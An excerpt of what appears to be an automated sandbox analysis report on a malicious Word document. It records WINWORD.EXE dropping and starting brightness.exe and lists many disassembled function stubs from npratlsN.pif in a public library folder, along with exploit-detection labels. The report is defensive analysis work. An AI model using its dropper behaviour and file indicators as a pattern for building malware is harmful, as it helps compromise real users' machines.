0000000F.00000003.2043487630.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000F.00000003.2043487630.00000000005F7000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_029058B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_029058B4

          Software Vulnerabilities

          barindex
          Document exploit detected (creates forbidden files)
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exeJump to behavior
          Document exploit detected (drops PE files)
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: brightness.exe.0.drJump to dropped file
          Document exploit detected (process start blacklist hit)
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\brightness.exe
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h8_2_285FDD08
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2B7CF2B5h8_2_2B7CF0C9
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2B7CFC3Fh8_2_2B7CF0C9
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2B7CE0C5h8_2_2B7CDF07
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2B7CE0C5h8_2_2B7CE114
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_2B7CE5E8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88185Dh8_2_2C881440
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C8810E9h8_2_2C880E38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88DF41h8_2_2C88DC98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88E399h8_2_2C88E0F0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88185Dh8_2_2C881431
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88DAE9h8_2_2C88D840
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88B829h8_2_2C88B580
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88EC49h8_2_2C88E9A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88BC81h8_2_2C88B9D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88F0A1h8_2_2C88EDF8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88E7F1h8_2_2C88E548
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88C531h8_2_2C88C288
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88F951h8_2_2C88F6A8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88C989h8_2_2C88C6E0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88C0D9h8_2_2C88BE30
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88F4F9h8_2_2C88F250
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88185Dh8_2_2C88178B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88D239h8_2_2C88CF90
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88D691h8_2_2C88D3E8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88FDA9h8_2_2C88FB00
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C88CDE1h8_2_2C88CB38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C892151h8_2_2C891EA8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C897DC0h8_2_2C897AF0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89BC4Eh8_2_2C89B980
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C8968FDh8_2_2C8965C0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C890741h8_2_2C890498
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89E55Eh8_2_2C89E290
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89C56Eh8_2_2C89C2A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C895B61h8_2_2C8958B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89A57Eh8_2_2C89A2B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C893769h8_2_2C8934C0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89517Bh8_2_2C894ED0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89F79Eh8_2_2C89F4D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89D7AEh8_2_2C89D4E0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C890B99h8_2_2C8908F0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89B7BEh8_2_2C89B4F0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89E0CEh8_2_2C89DE00
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89C0DEh8_2_2C89BE10
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C8948C9h8_2_2C894620
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89F30Eh8_2_2C89F040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C8902E9h8_2_2C890040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C891CF9h8_2_2C891A50
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89D31Eh8_2_2C89D050
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C893311h8_2_2C893068
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89B32Eh8_2_2C89B060
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C895709h8_2_2C895460
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C894D21h8_2_2C894A78
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov esp, ebp8_2_2C899B8B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C891449h8_2_2C8911A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89EE7Eh8_2_2C89EBB0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C894471h8_2_2C8941C8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89CE8Eh8_2_2C89CBC0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89AE9Eh8_2_2C89ABD0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C8918A1h8_2_2C8915F8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C893BC1h8_2_2C893918
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C895FB9h8_2_2C895D10
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89E9EEh8_2_2C89E720
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89C9FEh8_2_2C89C730
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C890FF1h8_2_2C890D48
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89AA0Eh8_2_2C89A740
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89701Ah8_2_2C896F69
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C896411h8_2_2C896168
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89FC2Eh8_2_2C89F960
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89701Ah8_2_2C896F70
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C894019h8_2_2C893D70
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89DC3Eh8_2_2C89D970
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C905730h8_2_2C905438
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C906588h8_2_2C906290
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C905107h8_2_2C904D98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C909090h8_2_2C908D98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90A878h8_2_2C90A580
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C902756h8_2_2C902488
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90D380h8_2_2C90D088
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C9078A8h8_2_2C9075B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C901086h8_2_2C900DB8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90A3B0h8_2_2C90A0B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90BB98h8_2_2C90B8A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C903076h8_2_2C902DA8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90E6A0h8_2_2C90E3A8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90079Eh8_2_2C9004D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C908BC8h8_2_2C9088D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C9019A6h8_2_2C9016D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90B6D0h8_2_2C90B3D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90CEB8h8_2_2C90CBC0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C903997h8_2_2C9036C8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C9060C0h8_2_2C905DC8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90F9C0h8_2_2C90F6C8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C909EE8h8_2_2C909BF0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C9022C6h8_2_2C901FF8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90C9F0h8_2_2C90C6F8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90E1D8h8_2_2C90DEE0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C9042B6h8_2_2C903FE8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C9073E0h8_2_2C9070E8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90B208h8_2_2C90AF10
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C902BE6h8_2_2C902918
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90DD10h8_2_2C90DA18
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C905BF8h8_2_2C905900
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90F4F9h8_2_2C90F200
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C904BD6h8_2_2C904908
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C908700h8_2_2C908408
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90C528h8_2_2C90C230
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C903506h8_2_2C903238
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90F030h8_2_2C90ED38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C906F18h8_2_2C906C20
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C909A20h8_2_2C909728
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90D848h8_2_2C90D550
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C903E26h8_2_2C903B58
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C906A50h8_2_2C906758
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90030Eh8_2_2C900040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C908238h8_2_2C907F40
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C901516h8_2_2C901248
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90AD40h8_2_2C90AA48
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90EB68h8_2_2C90E870
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C904746h8_2_2C904478
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C907D70h8_2_2C907A78
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C900C07h8_2_2C900960
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C909558h8_2_2C909260
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C901E36h8_2_2C901B68
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90C060h8_2_2C90BD68
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C941190h8_2_2C940E98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C940338h8_2_2C940040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C940CC8h8_2_2C9409D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C940800h8_2_2C940508
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then push 00000000h8_2_2C96479F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_2C96003B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_2C960040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_2C960356
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]8_2_2D024C9C
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]8_2_2D027AC3
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h14_2_33EFDD08
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 370DF2B5h14_2_370DF0C9
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 370DFC3Fh14_2_370DF0C9
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_370DE5E8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 370DE0C5h14_2_370DE114
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 370DE0C5h14_2_370DDF07
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_370DEDFB
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_370DEC1B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819185Dh14_2_38191440
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381910E9h14_2_38190E38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819DAE9h14_2_3819D840
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819DF41h14_2_3819DC98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819E399h14_2_3819E0F0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819E7F1h14_2_3819E548
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819B829h14_2_3819B580
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819EC49h14_2_3819E9A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819BC81h14_2_3819B9D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819F0A1h14_2_3819EDF8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819C0D9h14_2_3819BE30
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819F4F9h14_2_3819F250
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819C531h14_2_3819C288
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819F951h14_2_3819F6A8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819C989h14_2_3819C6E0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819FDA9h14_2_3819FB00
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819CDE1h14_2_3819CB38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819D239h14_2_3819CF90
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819185Dh14_2_3819178B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819D691h14_2_3819D3E8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A5B61h14_2_381A58B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A7DC0h14_2_381A7AF0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381ABC4Eh14_2_381AB980
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A68FDh14_2_381A65C0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AC0DEh14_2_381ABE10
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AE0CEh14_2_381ADE00
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A48C9h14_2_381A4620
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A1CF9h14_2_381A1A50
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AD31Eh14_2_381AD050
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AF30Eh14_2_381AF040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A02E9h14_2_381A0040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A4D21h14_2_381A4A78
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A3311h14_2_381A3068
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AB32Eh14_2_381AB060
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A5709h14_2_381A5460
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A0741h14_2_381A0498
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AE55Eh14_2_381AE290
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AA57Eh14_2_381AA2B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A2151h14_2_381A1EA8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AC56Eh14_2_381AC2A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A517Bh14_2_381A4ED0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AF79Eh14_2_381AF4D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A3769h14_2_381A34C0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A0B99h14_2_381A08F0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AB7BEh14_2_381AB4F0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AD7AEh14_2_381AD4E0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A3BC1h14_2_381A3918
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A5FB9h14_2_381A5D10
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AC9FEh14_2_381AC730
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AE9EEh14_2_381AE720
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A0FF1h14_2_381A0D48
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AAA0Eh14_2_381AA740
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A701Ah14_2_381A6F70
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A4019h14_2_381A3D70
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381ADC3Eh14_2_381AD970
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A6411h14_2_381A6168
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A701Ah14_2_381A6F69
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AFC2Eh14_2_381AF960
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov esp, ebp14_2_381A9B90
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AEE7Eh14_2_381AEBB0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A1449h14_2_381A11A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AAE9Eh14_2_381AABD0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A4471h14_2_381A41C8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381ACE8Eh14_2_381ACBC0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A18A1h14_2_381A15F8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38219A20h14_2_38219728
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38215730h14_2_38215438
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38216F18h14_2_38216C20
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821C528h14_2_3821C230
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38213506h14_2_38213238
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821F030h14_2_3821ED38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38215BF8h14_2_38215900
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821F4F9h14_2_3821F200
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38214BD6h14_2_38214908
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38218700h14_2_38218408
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821B208h14_2_3821AF10
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38212BE6h14_2_38212918
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821DD10h14_2_3821DA18
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38210C07h14_2_38210960
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38219558h14_2_38219260
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38211E36h14_2_38211B68
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821C060h14_2_3821BD68
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821EB68h14_2_3821E870
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38214746h14_2_38214478
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38217D70h14_2_38217A78
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821030Eh14_2_38210040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38218238h14_2_38217F40
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38211516h14_2_38211248
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821AD40h14_2_3821AA48
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821D848h14_2_3821D550
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38213E26h14_2_38213B58
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38216A50h14_2_38216758
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821BB98h14_2_3821B8A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38213076h14_2_38212DA8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821E6A0h14_2_3821E3A8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 382178A8h14_2_382175B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38211086h14_2_38210DB8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821A3B0h14_2_3821A0B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821A878h14_2_3821A580
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38212756h14_2_38212488
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821D380h14_2_3821D088
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38216588h14_2_38216290
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38215107h14_2_38214D98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38219090h14_2_38218D98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821E1D8h14_2_3821DEE0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 382142B6h14_2_38213FE8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 382173E0h14_2_382170E8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38219EE8h14_2_38219BF0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 382122C6h14_2_38211FF8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821C9F0h14_2_3821C6F8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821CEB8h14_2_3821CBC0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38213997h14_2_382136C8
